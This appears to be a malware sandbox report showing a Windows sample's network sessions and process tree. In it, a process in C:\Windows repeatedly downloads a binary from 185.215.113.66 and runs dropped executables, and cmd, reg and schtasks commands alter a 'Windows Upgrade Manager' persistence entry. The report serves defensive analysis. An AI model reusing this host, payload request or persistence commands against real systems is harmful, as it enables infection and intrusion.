                                                                  Nov 28, 2024 18:18:48.794529915 CET1236INData Raw: 18 cc cd 2e 2c 93 be f5 64 21 53 28 67 7c 9f 84 16 87 23 f1 17 86 59 2e 5f d2 2e 27 47 91 31 39 a5 fa 7b 79 75 f2 ca f2 20 69 fa 3e 65 90 eb d4 bd 73 bc e1 3b dd 6e c3 13 13 6a 1c 1c 3a ee 0c a0 13 63 dd 75 a0 5e be b1 11 24 13 7d df 1e 5b 85 91
                                                                  Data Ascii: .,d!S(g|#Y._.'G19{yu i>es;nj:cu^$}[ypBK(8l~nxpYD93ztk+;+.N)TUadbh#^cQ=?`[7Ln]GEADWPMJGRpi2eKKcBS/<
                                                                  Nov 28, 2024 18:18:48.794764996 CET328INData Raw: 75 85 fd 8b 7b 64 6d 67 e3 96 2f 34 31 cf ed 26 97 8e 88 d4 44 92 20 bc bf 81 65 42 f1 9e 7b 72 7f 6a 20 c5 82 f0 20 e7 5b b8 a8 24 e7 c4 c3 5d ed 53 61 0a 7d 71 e8 5a 71 31 23 11 4e 0c 36 e1 f5 75 b1 a5 65 23 90 7e 5c e6 63 50 19 23 7a ff 83 74
                                                                  Data Ascii: u{dmg/41&D eB{rj [$]Sa}qZq1#N6ue#~\cP#ztb`kkI4&"/V+n^@8To#)ldAzEy<0kUC^C~v*5kYvJRZD,pZI|{2Q+7>+%i7^V.-(
                                                                  Nov 28, 2024 18:18:48.794778109 CET1236INData Raw: 67 14 51 95 3d b3 54 99 9a da 81 fc b7 14 12 2e 98 5e ac b1 fa 83 8b 5e 72 08 07 18 26 36 93 86 0e 4c 5e c4 84 31 fc 1b f4 c2 86 23 15 ae 6e e9 7a 33 d6 17 1e 43 cf 1b af e2 88 13 f3 c9 6a d5 1e 63 83 83 33 4d f4 a6 45 24 c6 a4 1e a2 0f 21 a5 82
                                                                  Data Ascii: gQ=T.^^r&6L^1#nz3Cjc3ME$!#b8jKWajy/'5nZe9m$5)^i|$p>P!t1a~i4n T'HMjEzkxn9qlWj_q=6GnC|K[Yu
                                                                  Nov 28, 2024 18:18:48.922482014 CET1236INData Raw: 83 cc 50 6d 19 87 5d 0f a0 59 a1 75 1a 55 87 4f 12 81 3e 07 c5 c8 99 bb 5a ab 96 a0 d1 93 3c 3a 8d 73 00 02 cf d0 0d 1d 43 4a 31 c0 43 bb 44 33 ff f4 85 f5 e5 22 2d b2 73 35 bb 4d ca ec e5 d3 95 6e d1 e6 06 6a 1c 25 e2 39 2d ad 06 74 b0 74 d2 b9
                                                                  Data Ascii: Pm]YuUO>Z<:sCJ1CD3"-s5Mnj%9-ttE)8.,Z-1ojcfT"skh/YQmFv24VD,`R;&-!Q'rc@=;W@RN:Q"d,M$:Y[fy<a e


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  4 | 192.168.2.10 | 49712 | 185.215.113.66 | 80 | 7656 | C:\Windows\sysnldcvmr.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 28, 2024 18:18:49.693259001 CET | 166 | OUT | GET /2 HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                  Host: 185.215.113.66
                                                                  Nov 28, 2024 18:18:51.034643888 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Thu, 28 Nov 2024 17:18:50 GMT
                                                                  Content-Type: application/octet-stream
                                                                  Content-Length: 10496
                                                                  Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                  Connection: keep-alive
                                                                  ETag: "67154d18-2900"
                                                                  Accept-Ranges: bytes
                                                                  Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                  Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
                                                                  Nov 28, 2024 18:18:51.034725904 CET224INData Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96
                                                                  Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>*B aw'&iEpRaMZ|3Fk<lQ;GbPMlh5}8m;aj
                                                                  Nov 28, 2024 18:18:51.034739017 CET1236INData Raw: 57 2c cc 4e e9 93 b3 98 99 37 7f 26 84 18 f6 89 b3 51 4b 68 2e aa eb 28 5b 67 c2 09 58 43 b9 1d 1d 19 7e af c3 53 17 6c 0b ba b5 b6 6d f0 37 9e 17 bc da b3 c1 05 6c f2 93 67 30 bd 68 64 0b ea eb 37 92 a2 00 4e 6e 79 4d 38 25 da 04 51 66 b1 37 19
                                                                  Data Ascii: W,N7&QKh.([gXC~Slm7lg0hd7NnyM8%Qf7|VbF9?gk{is6u_pi!F`L4<c_^F992M\v)=Ov+uQP>"B SE<h76\
                                                                  Nov 28, 2024 18:18:51.034775019 CET1236INData Raw: 75 92 9f e1 f9 e6 29 3b 58 62 3c 3e ee 4d 5c ff 89 ad 07 e1 c5 53 10 04 a3 9b 91 41 50 dd 80 d7 b0 77 c1 85 ae 83 44 81 dd c0 04 63 a3 11 90 99 5b ae f0 f8 38 dd 71 2d 21 80 71 5d bd 04 ba d3 63 92 a2 37 99 76 70 90 bc 1a 82 be ff 2e d3 d1 f4 f7
                                                                  Data Ascii: u);Xb<>M\SAPwDc[8q-!q]c7vp.nnF{<~zdrmXt$8&2c^_E98k-70~?]$==T+TM^e~'O(wGX\1Y&$_xFLz
                                                                  Nov 28, 2024 18:18:51.034795046 CET1236INData Raw: f9 88 5f a6 24 ef 65 f7 e3 05 82 c5 fb 4d 84 3b 04 0e 42 92 eb 9b 6e 69 2c 39 59 3b 8f 70 7a 08 ac ae 40 45 98 6c 63 bf 2e 99 7d 94 9a 8b f1 c3 cc 4a 57 06 c2 3e e9 9a 34 3d 9c 5c 75 16 3d de bc 1d 46 0f 84 f9 25 bc c9 d9 aa 24 17 92 da 25 5f 5e
                                                                  Data Ascii: _$eM;Bni,9Y;pz@Elc.}JW>4=\u=F%$%_^R'IK4]x+.i/ qh['3(@`{nl;UfB5!59uGJ0hR!u(*d:Serk)BdWml
                                                                  Nov 28, 2024 18:18:51.034807920 CET1236INData Raw: 33 db 32 61 b3 d8 a6 03 60 93 23 26 f3 db ee b2 b6 8d 41 e9 57 78 64 89 3c 2c b2 17 d6 f6 a4 7f d9 76 5c 5d be de 02 8b 48 96 18 68 71 22 90 de 9d 34 6b 57 c9 fe 86 27 d7 fa 7b 1e 77 52 17 a8 34 f6 42 c9 a0 41 e9 93 3d 67 10 2d 53 92 19 a5 2a 4d
                                                                  Data Ascii: 32a`#&AWxd<,v\]Hhq"4kW'{wR4BA=g-S*M^~lv^b%\Z)zW0EZSM#x6Y=z)}s]KL\Bd@!qcBXfk=*}nfKWLFy6qijjq6b&?:2c4
                                                                  Nov 28, 2024 18:18:51.034821033 CET1236INData Raw: 0e 6f ab 62 60 7c b0 1a 8a 00 94 62 f1 1b ab f5 db 53 f6 c3 63 f3 f2 56 9e 3c 8f 84 4e e0 13 c7 99 5e 0b bf 53 e6 4d 25 44 02 a3 7a 1d 2a 7f 61 ea 30 29 a1 ac 16 e6 e4 ce 74 93 05 15 d8 99 c1 dc 61 c8 99 e5 6f ff e0 a1 28 4a 81 cd 61 ff d7 cd 0d
                                                                  Data Ascii: ob`|bScV<N^SM%Dz*a0)tao(Jag{;5? w7m1j"zAJV,VjHN^C1uU\=AM-/!,]aYIRpoo9RjW`u-"W}v4dD8xhDtqUl/2
                                                                  Nov 28, 2024 18:18:51.034974098 CET1236INData Raw: c7 b2 21 51 5b 02 28 fb d0 37 a8 0e 5f 60 45 13 ae e0 d7 f7 ac cd fd 41 47 37 46 e4 06 80 d3 00 31 a7 71 ee fb 51 f0 c3 5c 6c ec 9c fb 02 ba 5d e7 0a 8b da c9 8a aa 7a 17 c0 c3 58 dc 6d 6c 4d 69 8e ff 61 e4 f8 83 1f 0a fe d9 fe 0e 49 e3 78 30 66
                                                                  Data Ascii: !Q[(7_`EAG7F1qQ\l]zXmlMiaIx0f] KonttGp#3wdtgd(,v=-UsW^z]x&%tu=H%/}h+wy*(V#Qpg+I#rkr#rLw{bE*!NlH|3
                                                                  Nov 28, 2024 18:18:51.034989119 CET1236INData Raw: 83 0c 55 8b 0d 06 4d 91 1d e6 40 8d 8f 82 16 15 af 71 1f ce 8d fd ef 11 6f 0b c3 62 a3 38 a7 e9 91 07 45 04 ab 68 ed de 3d c1 0c 0b 24 ac 3c 82 09 6e 4b 7e 33 0a 3a 8e dc 23 f3 36 da 9d 60 0c 00 c6 bc c1 2c 51 c5 d8 a8 d7 5f f6 ff e8 11 4b cd 78
                                                                  Data Ascii: UM@qob8Eh=$<nK~3:#6`,Q_KxNo(Ul-&g+,'3%{s3_3I')#&r|Fd aIQ<dX=lLv=1pjqZ)zo6hymsjw\#i0+X
                                                                  Nov 28, 2024 18:18:51.035000086 CET649INData Raw: da ca 34 31 cb 8c dd 52 e1 dc 6d 55 5c 67 82 11 64 11 ba 62 ba d5 2e c2 ee 05 c7 dd 0e 36 46 60 93 3a 2b 50 b2 86 d9 02 4a 9d dd 8f 5d 10 90 20 83 07 06 0d 4e 94 42 c8 3c 52 75 87 3f f3 51 a2 4f b6 d8 46 4e f3 84 78 ca d1 fb 54 2b 2c 40 63 18 f5
                                                                  Data Ascii: 41RmU\gdb.6F`:+PJ] NB<Ru?QOFNxT+,@cp1/Fw@#y$wHsa!z_NwwofcwHsyGPgO/j>hcw0*5Yv[X'*jq$:+L<k


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  5 | 192.168.2.10 | 49713 | 185.215.113.66 | 80 | 7656 | C:\Windows\sysnldcvmr.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 28, 2024 18:18:52.161539078 CET | 166 | OUT | GET /2 HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                  Host: 185.215.113.66
                                                                  Nov 28, 2024 18:18:53.558790922 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Thu, 28 Nov 2024 17:18:53 GMT
                                                                  Content-Type: application/octet-stream
                                                                  Content-Length: 10496
                                                                  Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                  Connection: keep-alive
                                                                  ETag: "67154d18-2900"
                                                                  Accept-Ranges: bytes
                                                                  Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                  Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
                                                                  Nov 28, 2024 18:18:53.558813095 CET124INData Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96
                                                                  Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>
                                                                  Nov 28, 2024 18:18:53.560559034 CET1236INData Raw: 2a a9 81 d6 fd 42 20 61 77 b3 e1 96 27 26 69 a5 a5 fd 12 45 e7 70 8e 52 61 02 17 bc a9 fa 4d a1 ea eb 5a fb ad a9 7c e3 d6 09 c7 bf 33 87 46 cc 6b 3c ed 6c d3 51 3b fe c7 be d3 12 b7 d8 47 62 86 b4 a5 12 50 1b 06 4d 8c ed 6c 18 68 d3 b2 17 e9 35
                                                                  Data Ascii: *B aw'&iEpRaMZ|3Fk<lQ;GbPMlh5}8m;ajW,N7&QKh.([gXC~Slm7lg0hd7NnyM8%Qf7|VbF9?gk{is6u_pi!
                                                                  Nov 28, 2024 18:18:53.560581923 CET1236INData Raw: 4b dc 75 22 a9 31 18 da 58 da 9c 5b 38 49 62 0f b2 64 bd f8 00 b5 79 6d 2d 2a c5 7c 0a c5 a7 e9 1e a3 fd 06 2b 0f de a6 3e 61 08 18 aa 60 84 ce 3c fb 5a cc 21 25 12 f9 d9 17 a6 7c 20 a2 34 26 b5 80 dc bc 1c fc 99 e4 5b 2b d1 75 73 4c 5e a1 c3 65
                                                                  Data Ascii: Ku"1X[8Ibdym-*|+>a`<Z!%| 4&[+usL^etpuu);Xb<>M\SAPwDc[8q-!q]c7vp.nnF{<~zdrmXt$8&2c^_E98k-
                                                                  Nov 28, 2024 18:18:53.560594082 CET248INData Raw: 0b 3e 1f 18 b4 22 57 d9 8b 7c 31 98 16 87 ae e9 52 72 6d 5d c2 16 1d 54 31 c6 26 50 53 c5 b3 54 51 99 ab e5 bf ce ab 5a 8a 71 45 74 67 a4 63 0c 5b 55 2a 2c 09 40 f8 fc e9 05 9a 85 93 2b 1f c2 e7 ee b8 e5 f1 4c c2 16 6f c2 52 95 cb 30 72 4d 77 66
                                                                  Data Ascii: >"W|1Rrm]T1&PSTQZqEtgc[U*,@+LoR0rMwfu^VUzcie_$eM;Bni,9Y;pz@Elc.}JW>4=\u=F%$%_^R'IK4]x+.i/ qh['3(@
                                                                  Nov 28, 2024 18:18:53.562635899 CET1236INData Raw: b3 98 60 7b c2 fe 18 6e 6c 3b f9 ac a2 de d3 91 55 a0 66 42 35 cf 21 d2 35 e4 39 75 47 bc 4a 30 fd b3 ec 68 e2 05 c4 c5 0d b9 52 96 f9 ee 21 eb 75 28 d5 c0 2a 64 ef c0 3a ab 95 53 65 fa 72 6b 02 d9 89 0d 29 a1 42 a0 92 05 af 99 89 64 03 c4 b2 ec
                                                                  Data Ascii: `{nl;UfB5!59uGJ0hR!u(*d:Serk)BdWmlE)Mt9G2?=L*{Pq CT dsHHw+~1uDu,;xuv&eaAwm])pQ`Hvn
                                                                  Nov 28, 2024 18:18:53.562689066 CET1236INData Raw: 5d d4 ae 87 4b 4c 5c f5 f8 b1 42 1c 64 40 21 dd a9 b2 1b 90 9c 81 19 71 86 63 c3 42 58 66 10 97 16 6b 3d 84 2a 17 7d 6e 66 0d 82 1c 4b 89 f7 0c b4 fc 57 4c fe e5 46 ad 79 7f 9e 36 a4 b2 71 69 ed a1 f5 ad 6a 09 6a c9 cc 71 82 36 aa fa 62 12 93 06
                                                                  Data Ascii: ]KL\Bd@!qcBXfk=*}nfKWLFy6qijjq6b&?:2c4]&`iDl=z4EdgAD7&iM:_GHkd*UDfMvJ_;Pk9njT:S;7#B0;s9MxF!o-0.Iq&
                                                                  Nov 28, 2024 18:18:53.562700033 CET248INData Raw: 15 0a b1 41 8b 4d 2d 18 0d 2f 21 95 f5 2c 5d 7f 02 b3 e1 61 f1 81 14 90 ff a6 59 49 c6 b6 95 e1 52 b6 70 e5 9f b1 d7 6f 16 6f 39 ca 52 7f 6a 8d eb 57 0c 60 75 2d b8 22 aa d4 b9 c2 57 7d 76 34 64 44 38 78 a0 68 d0 a0 44 9b 74 71 55 fa f6 a6 80 b6
                                                                  Data Ascii: AM-/!,]aYIRpoo9RjW`u-"W}v4dD8xhDtqUl/2:O!iKv^l1=>rJ!;=wJo OhzO=q~qF.Bth]QL>uAZ Zva"HIbKd
                                                                  Nov 28, 2024 18:18:53.565061092 CET1236INData Raw: 1f c2 c0 01 a9 a1 6d 1c 12 79 22 13 1e 59 39 ac 6f ba 33 c7 51 89 42 71 cf 1c 0c 8a a5 b3 a3 8e 59 56 d1 23 1f 09 19 56 72 38 9b 0a 43 a7 37 de 43 6c 55 38 2e 2a 20 8e 0e 09 cd b6 08 2f b5 3b 37 dc 28 bb df 5e eb 88 be 15 b4 5a 53 48 ba 3e 33 d6
                                                                  Data Ascii: my"Y9o3QBqYV#Vr8C7ClU8.* /;7(^ZSH>3b\hljGkcy`L@&C7W{lxe;c|<>i+,R:ecIfgIDpU^16gr2g"{Sq#<m0r
                                                                  Nov 28, 2024 18:18:53.565097094 CET224INData Raw: f5 12 b9 95 02 be ba 75 47 ee c3 6f 92 65 e2 78 09 e4 c1 46 cc f6 1a 2a bb a3 8c 2d 7e 51 f6 94 14 b6 19 09 ee 3b 59 30 f7 6f 71 62 a9 7f 81 06 da ca f3 13 9d 08 c3 db 3d 8f 67 08 aa a4 cf 1e b1 d0 cd dc 50 14 2f 04 2d fd 11 53 e2 ae a4 dc c9 10
                                                                  Data Ascii: uGoexF*-~Q;Y0oqb=gP/-SeccZ?m_=UVTM'aYv_w&%k"- 1?3ul2'Kus2)^XCO"
                                                                  Nov 28, 2024 18:18:53.681180000 CET1236INData Raw: 09 dd 4e 8b 22 ca 5e 0c 07 45 5d 7a 0b 67 68 b7 ad fa 5b d6 21 a3 6e db 6c c4 f3 e4 d2 49 6f 6e d2 84 b7 9e 42 0f 04 d2 31 6a 85 84 67 d0 f6 27 90 bc 81 d5 7c f5 5d 77 3c 98 02 9e f6 4f a1 f7 79 7f 99 12 fa 13 fe 66 47 f4 1e e8 7f 25 57 bb 83 6c
                                                                  Data Ascii: N"^E]zgh[!nlIonB1jg'|]w<OyfG%Wl'X2c _'v^]XtCP8&S*.OU@:`#45/`:JI]<KDZWdT6aMep>a<Wym+OdkXaKY;,SPXD@`7Geq



                                                                  Target ID:0
                                                                  Start time:12:18:24
                                                                  Start date:28/11/2024
                                                                  Path:C:\Users\user\Desktop\LM94OE0VNK.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\LM94OE0VNK.exe"
                                                                  Imagebase:0x9c0000
                                                                  File size:10'240 bytes
                                                                  MD5 hash:8CE09F13942AB5BCB81B175996C8385F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:12:18:30
                                                                  Start date:28/11/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\2374323789.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\AppData\Local\Temp\2374323789.exe
                                                                  Imagebase:0x400000
                                                                  File size:80'896 bytes
                                                                  MD5 hash:0C883B1D66AFCE606D9830F48D69D74B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 75%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:12:18:33
                                                                  Start date:28/11/2024
                                                                  Path:C:\Windows\sysnldcvmr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\sysnldcvmr.exe
                                                                  Imagebase:0x400000
                                                                  File size:80'896 bytes
                                                                  MD5 hash:0C883B1D66AFCE606D9830F48D69D74B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 75%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:12:18:45
                                                                  Start date:28/11/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\240016073.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\AppData\Local\Temp\240016073.exe
                                                                  Imagebase:0xe30000
                                                                  File size:8'704 bytes
                                                                  MD5 hash:CB8420E681F68DB1BAD5ED24E7B22114
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 79%, ReversingLabs
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:12:18:45
                                                                  Start date:28/11/2024
                                                                  Path:C:\Windows\sysnldcvmr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\sysnldcvmr.exe"
                                                                  Imagebase:0x400000
                                                                  File size:80'896 bytes
                                                                  MD5 hash:0C883B1D66AFCE606D9830F48D69D74B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:8
                                                                  Start time:12:18:46
                                                                  Start date:28/11/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                  Imagebase:0x7ff7c5210000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:9
                                                                  Start time:12:18:46
                                                                  Start date:28/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff620390000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:10
                                                                  Start time:12:18:46
                                                                  Start date:28/11/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                  Imagebase:0x7ff7c5210000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:11
                                                                  Start time:12:18:46
                                                                  Start date:28/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff620390000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:12
                                                                  Start time:12:18:46
                                                                  Start date:28/11/2024
                                                                  Path:C:\Windows\System32\reg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                  Imagebase:0x7ff7f5060000
                                                                  File size:77'312 bytes
                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:13
                                                                  Start time:12:18:46
                                                                  Start date:28/11/2024
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                  Imagebase:0x7ff696e40000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:14
                                                                  Start time:12:18:50
                                                                  Start date:28/11/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\2693731851.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\AppData\Local\Temp\2693731851.exe
                                                                  Imagebase:0x400000
                                                                  File size:80'896 bytes
                                                                  MD5 hash:0C883B1D66AFCE606D9830F48D69D74B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 75%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true


                                                                    Execution Graph

                                                                    Execution Coverage:36.6%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:26.3%
                                                                    Total number of Nodes:95
                                                                    Total number of Limit Nodes:5
